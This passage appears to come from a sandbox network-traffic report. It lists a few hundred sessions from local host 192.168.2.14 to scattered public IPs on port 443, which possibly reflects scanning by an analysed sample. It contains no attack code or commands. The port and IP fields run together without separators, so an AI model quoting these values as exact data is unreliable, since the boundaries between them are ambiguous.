                                                        13606192.168.2.145106446.68.65.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13607192.168.2.143558457.45.98.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13608192.168.2.1440530196.229.179.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13609192.168.2.146075260.68.138.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13610192.168.2.1446428217.8.205.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13611192.168.2.144651886.142.0.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13612192.168.2.143531889.74.175.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13613192.168.2.1433582154.197.196.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13614192.168.2.1452756131.234.137.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13615192.168.2.1441714106.1.23.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13616192.168.2.1459872149.84.103.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13617192.168.2.1434058209.142.200.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13618192.168.2.1455052156.58.144.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13619192.168.2.1439688122.90.123.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13620192.168.2.145762695.153.245.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13621192.168.2.1460916157.181.66.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13622192.168.2.1450746115.205.148.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13623192.168.2.145996671.137.170.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13624192.168.2.1447274105.76.21.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13625192.168.2.145408425.138.80.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13626192.168.2.1450916223.237.1.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13627192.168.2.145906674.55.130.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13628192.168.2.145618662.202.60.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13629192.168.2.146044818.112.209.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13630192.168.2.1444342175.60.108.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13631192.168.2.1460514121.97.24.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13632192.168.2.1457540117.60.18.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13633192.168.2.143972872.101.126.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13634192.168.2.145754432.129.27.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13635192.168.2.1445770132.76.14.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13636192.168.2.1433382200.67.1.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13637192.168.2.1439046135.83.245.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13638192.168.2.1443846157.189.82.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13639192.168.2.1447784109.86.190.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13640192.168.2.1454714169.131.8.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13641192.168.2.144182245.187.230.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13642192.168.2.1448926219.52.46.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13643192.168.2.1450720138.233.233.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13644192.168.2.1457762126.255.28.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13645192.168.2.143997449.8.180.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13646192.168.2.1436752177.30.220.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13647192.168.2.1458234155.172.75.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13648192.168.2.14369208.31.46.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13649192.168.2.1458460169.202.126.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13650192.168.2.1438056179.142.93.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13651192.168.2.1445870199.114.235.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13652192.168.2.1438270155.251.154.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13653192.168.2.1444834113.168.244.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13654192.168.2.144680257.85.228.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13655192.168.2.1453662209.126.113.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13656192.168.2.1438828162.245.30.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13657192.168.2.1447514115.80.71.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13658192.168.2.1455844200.35.215.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13659192.168.2.145385080.116.57.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13660192.168.2.1457260102.60.144.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13661192.168.2.143886236.218.131.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13662192.168.2.145188890.76.9.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13663192.168.2.145147038.65.158.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13664192.168.2.143751447.162.84.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13665192.168.2.144754883.217.190.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13666192.168.2.143920252.120.4.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13667192.168.2.1446870148.157.177.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13668192.168.2.143817460.96.194.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13669192.168.2.143828490.197.154.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13670192.168.2.1447246103.27.8.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13671192.168.2.1435216188.1.52.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13672192.168.2.1460238180.146.66.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13673192.168.2.145525295.27.72.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13674192.168.2.1450904149.75.207.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13675192.168.2.1435872170.89.232.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13676192.168.2.145666086.74.17.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13677192.168.2.1442662185.133.47.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13678192.168.2.1438618178.170.46.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13679192.168.2.1439502185.132.4.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13680192.168.2.1459114143.255.170.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13681192.168.2.143313280.165.48.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13682192.168.2.145288634.140.154.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13683192.168.2.1460630161.233.220.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13684192.168.2.1447668106.54.176.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13685192.168.2.145003459.160.204.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13686192.168.2.1452396222.198.67.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13687192.168.2.143329620.226.74.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13688192.168.2.143538069.28.181.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13689192.168.2.145183863.170.150.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13690192.168.2.143536046.189.225.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13691192.168.2.1445794153.218.194.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13692192.168.2.144621868.58.118.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13693192.168.2.1445494168.50.86.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13694192.168.2.144574440.27.110.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13695192.168.2.1440414176.252.84.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13696192.168.2.1441906181.4.176.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13697192.168.2.1435152169.106.153.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13698192.168.2.1460168126.125.22.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13699192.168.2.144897044.104.163.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13700192.168.2.144874896.205.223.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13701192.168.2.1455798188.33.254.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13702192.168.2.1441524128.82.163.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13703192.168.2.1458094195.1.17.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13704192.168.2.1446260174.202.1.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13705192.168.2.1450922120.57.2.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13706192.168.2.144377872.160.45.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13707192.168.2.1444234153.140.240.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13708192.168.2.145868296.161.6.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13709192.168.2.1450130179.201.255.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13710192.168.2.145703270.220.49.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13711192.168.2.1455742190.188.47.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13712192.168.2.1452050107.59.226.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13713192.168.2.1443606114.210.99.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13714192.168.2.143963479.56.88.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13715192.168.2.1459324145.54.140.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13716192.168.2.144695052.4.38.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13717192.168.2.146033861.97.152.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13718192.168.2.1443478160.178.154.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13719192.168.2.145080450.125.233.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13720192.168.2.1435486110.19.118.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13721192.168.2.143639474.64.59.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13722192.168.2.1454700117.101.89.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13723192.168.2.143721459.117.122.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13724192.168.2.1441876180.215.238.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13725192.168.2.145970470.212.175.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13726192.168.2.145945646.0.242.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13727192.168.2.145014431.4.246.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13728192.168.2.145210890.104.99.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13729192.168.2.1447044193.203.119.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13730192.168.2.143984870.224.68.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13731192.168.2.145334091.41.214.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13732192.168.2.1439998132.62.201.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13733192.168.2.1441588154.169.46.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13734192.168.2.145175661.61.80.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13735192.168.2.144866853.253.209.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13736192.168.2.1443628223.35.151.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13737192.168.2.1450774195.101.54.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13738192.168.2.1443732145.42.80.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13739192.168.2.143449441.230.138.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13740192.168.2.1447700107.166.52.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13741192.168.2.1447896135.10.121.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13742192.168.2.145353420.20.67.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13743192.168.2.1446086118.107.98.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13744192.168.2.144003291.79.82.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13745192.168.2.143341065.213.129.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13746192.168.2.145326213.190.242.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13747192.168.2.1453662118.33.18.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13748192.168.2.1443472179.165.53.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13749192.168.2.1451556118.87.4.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13750192.168.2.1460906189.132.129.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13751192.168.2.145676082.105.23.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13752192.168.2.145261820.196.173.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13753192.168.2.1443592207.62.168.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13754192.168.2.145747499.180.218.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13755192.168.2.144919468.72.14.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13756192.168.2.143718237.151.187.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13757192.168.2.1443296223.203.246.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13758192.168.2.146048660.54.240.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13759192.168.2.1447824212.2.89.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13760192.168.2.143810484.3.18.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13761192.168.2.1433600164.19.209.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13762192.168.2.1439994103.94.60.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13763192.168.2.145081217.129.100.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13764192.168.2.145964218.81.225.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13765192.168.2.144295282.96.167.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13766192.168.2.1434820202.187.222.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13767192.168.2.145479490.215.49.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13768192.168.2.1436904198.191.65.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13769192.168.2.1449416141.139.37.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13770192.168.2.143360650.57.158.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13771192.168.2.1445576144.151.7.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13772192.168.2.1442888201.207.1.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13773192.168.2.145420448.147.225.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13774192.168.2.1440466113.86.56.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13775192.168.2.143946484.215.54.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13776192.168.2.1460576139.106.167.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13777192.168.2.1454148192.147.211.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13778192.168.2.1444304140.65.29.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13779192.168.2.1438510104.126.119.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13780192.168.2.1454004110.219.133.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13781192.168.2.1432960184.25.76.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13782192.168.2.1435784110.209.208.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13783192.168.2.1457302160.41.69.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13784192.168.2.1436604117.206.112.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13785192.168.2.1433116116.106.245.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13786192.168.2.145986483.111.110.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13787192.168.2.1444346146.90.168.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13788192.168.2.1456360169.90.6.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13789192.168.2.145844442.195.178.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13790192.168.2.146000651.149.97.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13791192.168.2.1459792166.115.157.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13792192.168.2.1437342147.130.10.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13793192.168.2.1454464152.118.193.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13794192.168.2.1447966134.20.30.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13795192.168.2.144798840.45.168.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13796192.168.2.1451822206.186.7.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13797192.168.2.1452184202.219.238.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13798192.168.2.1437450216.154.131.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13799192.168.2.1440778219.210.120.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13800192.168.2.1438200179.36.69.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13801192.168.2.1455978159.180.12.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13802192.168.2.14333044.33.133.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13803192.168.2.1460358200.179.46.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13804192.168.2.14483748.67.230.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13805192.168.2.145428098.8.161.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13806192.168.2.1446890107.168.84.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13807192.168.2.1445570155.67.219.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13808192.168.2.1457368164.126.14.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13809192.168.2.143628813.105.101.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13810192.168.2.145259673.249.150.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13811192.168.2.143457824.199.99.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13812192.168.2.144290823.10.73.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13813192.168.2.1454088220.195.156.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13814192.168.2.1434540155.224.109.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13815192.168.2.1458166187.123.32.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13816192.168.2.1460206167.85.68.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13817192.168.2.1454098161.219.46.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13818192.168.2.1450748183.237.191.85443
